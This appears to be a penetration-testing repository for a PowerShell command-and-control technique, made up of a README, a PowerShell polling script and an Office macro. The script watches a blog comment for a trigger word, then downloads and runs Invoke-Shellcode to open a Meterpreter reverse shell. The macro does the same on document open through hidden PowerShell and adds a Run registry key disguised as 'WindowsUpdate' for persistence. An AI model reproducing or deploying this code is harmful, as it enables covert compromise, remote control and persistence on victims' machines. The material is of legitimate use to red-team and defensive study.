├── README.md
├── C2Code.ps1
└── Macro


/README.md:
--------------------------------------------------------------------------------
 1 | Powershell-C2
 2 | =============
 3 | 
 4 | This attack stems off of my Powershell Payload Excel Delivery, but it uses a really cool method for Command and Control/persistence on the box.
 5 | 
 6 | A walk-through can be found here: http://enigma0x3.wordpress.com/2014/01/17/command-and-control-using-powershell-and-your-favorite-website/
 7 | 
 8 | 
 9 | Credit to @obscuresec and @mattifestation for this method. Their talk about it can be found here:
10 | http://www.youtube.com/watch?v=j-r6UonEkUw
11 | 


--------------------------------------------------------------------------------
/C2Code.ps1:
--------------------------------------------------------------------------------
 1 | #Credit to @obscuresec and @mattifestation for this
 2 | 
 3 | $Word = 'h4x0r'
 4 | $WebClientObject = New-Object Net.WebClient
 5 | $comment = "http://enigma0x3.wordpress.com/2014/01/15/new-feature-added-to-powershell-payload-excel-delivery/"
 6 | $WebClientObject.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36)") 
 7 | While($True){
 8 | $CommentResult = $WebClientObject.DownloadString($comment)
 9 | $Found = $CommentResult.contains($Word)
10 | If($Found) {
11 | IEX $WebClientObject.DownloadString('http://192.168.1.127/Invoke-Shellcode')
12 | Invoke-Shellcode -Payload windows/meterpreter/reverse_https -LHOST 192.168.1.127 -LPORT 1111 -Force
13 | Return
14 | }
15 | Start-Sleep -Seconds 30
16 | }
17 | 


--------------------------------------------------------------------------------
/Macro:
--------------------------------------------------------------------------------
 1 | ' Author: Matt Nelson
 2 | ' Twitter: @enigma0x3
 3 | 
 4 | Sub Auto_Open()
 5 | Execute
 6 | Persist
 7 | 
 8 | End Sub
 9 | 
10 | 
11 |      Public Function Execute() As Variant
12 |         Const HIDDEN_WINDOW = 0
13 |         strComputer = "."
14 |         Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
15 |          
16 |         Set objStartup = objWMIService.Get("Win32_ProcessStartup")
17 |         Set objConfig = objStartup.SpawnInstance_
18 |         objConfig.ShowWindow = HIDDEN_WINDOW
19 |         Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
20 |         objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
21 |      End Function
22 | 
23 |       
24 |      Public Function Persist() As Variant
25 |         Dim WShell As Object
26 |         Set WShell = CreateObject("WScript.Shell")
27 |         WShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate", "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -NonInteractive -WindowStyle Hidden -noprofile -noexit -Command IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/persist.ps1'))", "REG_SZ"
28 |         Set WShell = Nothing
29 |     End Function
30 | 


--------------------------------------------------------------------------------